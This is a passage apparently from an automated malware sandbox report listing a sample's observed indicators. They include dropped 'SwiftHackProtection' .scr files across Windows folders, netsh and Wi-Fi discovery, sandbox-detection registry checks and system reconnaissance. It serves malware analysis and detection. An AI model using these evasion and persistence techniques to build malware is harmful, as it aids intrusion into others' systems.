cmd.exe File created C:\Program Files\SwiftHackProtection32722.scr cmd.exe File created C:\Program Files\SwiftHackProtection3248.scr cmd.exe File created C:\Program Files\SwiftHackProtection2074.scr cmd.exe File created C:\Program Files\SwiftHackProtection25612.scr cmd.exe File created C:\Program Files\SwiftHackProtection31316.scr cmd.exe File created C:\Program Files\SwiftHackProtection14984.scr cmd.exe File created C:\Program Files\SwiftHackProtection19879.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection30480.scr cmd.exe File created C:\Program Files\SwiftHackProtection31618.scr cmd.exe File created C:\Program Files\SwiftHackProtection26763.scr cmd.exe File opened for modification C:\Program Files\SwiftHackProtection1911.scr cmd.exe File created C:\Program Files\SwiftHackProtection28924.scr cmd.exe File created C:\Program Files\SwiftHackProtection32143.scr cmd.exe File created C:\Program Files\SwiftHackProtection15683.scr cmd.exe File created C:\Program Files\SwiftHackProtection4735.scr cmd.exe File created C:\Program Files\SwiftHackProtection19962.scr cmd.exe File created C:\Program Files\SwiftHackProtection8257.scr cmd.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\System\SwiftHackProtection24667.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection6125.scr cmd.exe File opened for modification C:\Windows\System\SwiftHackProtection7271.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection10693.scr cmd.exe File created C:\Windows\System\SwiftHackProtection22162.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection27030.scr cmd.exe File opened for modification C:\Windows\Web\SwiftHackProtection28338.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection30357.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection5839.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection17543.scr cmd.exe File opened for modification C:\Windows\Web\SwiftHackProtection13483.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection29704.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection6103.scr cmd.exe File created C:\Windows\SwiftHackProtection25720.scr cmd.exe File created C:\Windows\System\SwiftHackProtection13526.scr cmd.exe File created C:\Windows\System\SwiftHackProtection29758.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection22458.scr cmd.exe File created C:\Windows\SwiftHackProtection20480.scr cmd.exe File opened for modification C:\Windows\Web\SwiftHackProtection9612.scr cmd.exe File opened for modification C:\Windows\System\SwiftHackProtection25320.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection10463.scr cmd.exe File opened for modification C:\Windows\System\SwiftHackProtection13009.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection32300.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection32579.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection1676.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection12105.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection30375.scr cmd.exe File created C:\Windows\SwiftHackProtection2776.scr cmd.exe File created C:\Windows\System\SwiftHackProtection11577.scr cmd.exe File created C:\Windows\System\SwiftHackProtection3520.scr cmd.exe File opened for modification C:\Windows\Prefetch\SwiftHackProtection20901.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection9247.scr cmd.exe File created C:\Windows\SwiftHackProtection1279.scr cmd.exe File opened for modification C:\Windows\Web\SwiftHackProtection21322.scr cmd.exe File created C:\Windows\System\SwiftHackProtection21516.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection14517.scr cmd.exe File created C:\Windows\System\SwiftHackProtection14175.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection25643.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection31988.scr cmd.exe File created C:\Windows\System\SwiftHackProtection25467.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection31024.scr cmd.exe File created C:\Windows\SwiftHackProtection31074.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection19700.scr cmd.exe File opened for modification C:\Windows\System\SwiftHackProtection1313.scr cmd.exe File opened for modification C:\Windows\Prefetch\SwiftHackProtection22683.scr cmd.exe File created C:\Windows\System\SwiftHackProtection25959.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection21883.scr cmd.exe File created C:\Windows\System\SwiftHackProtection18076.scr cmd.exe File created C:\Windows\SwiftHackProtection23295.scr cmd.exe File opened for modification C:\Windows\Web\SwiftHackProtection11555.scr cmd.exe File opened for modification C:\Windows\SwiftHackProtection18838.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection2187.scr cmd.exe File created C:\Windows\System\SwiftHackProtection20023.scr cmd.exe File created C:\Windows\System\SwiftHackProtection22538.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection3351.scr cmd.exe File opened for modification C:\Windows\SwiftHackProtection1671.scr cmd.exe File opened for modification C:\Windows\Prefetch\SwiftHackProtection21803.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection25728.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection4475.scr cmd.exe File created C:\Windows\System\SwiftHackProtection1297.scr cmd.exe File created C:\Windows\System\SwiftHackProtection25065.scr cmd.exe File created C:\Windows\Prefetch\SwiftHackProtection18043.scr cmd.exe File created C:\Windows\System\SwiftHackProtection15651.scr cmd.exe File created C:\Windows\Web\SwiftHackProtection7336.scr cmd.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5024 sc.exe 1164 sc.exe 3860 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chrome.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chinah.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AgreementViewer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2032 netsh.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 mmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C explorer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 explorer.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4856 timeout.exe 4884 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease msinfo32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msinfo32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msinfo32.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2992 ipconfig.exe 4972 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2404 systeminfo.exe -
Kills process with taskkill 2 IoCs
pid Process 1940 taskkill.exe 2388 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache msdtc.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\hnetcfgclient.dll,-201 = "HNetCfg Client" svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\27\52C64B7E msdtc.exe -
Modifies registry class 64 IoCs
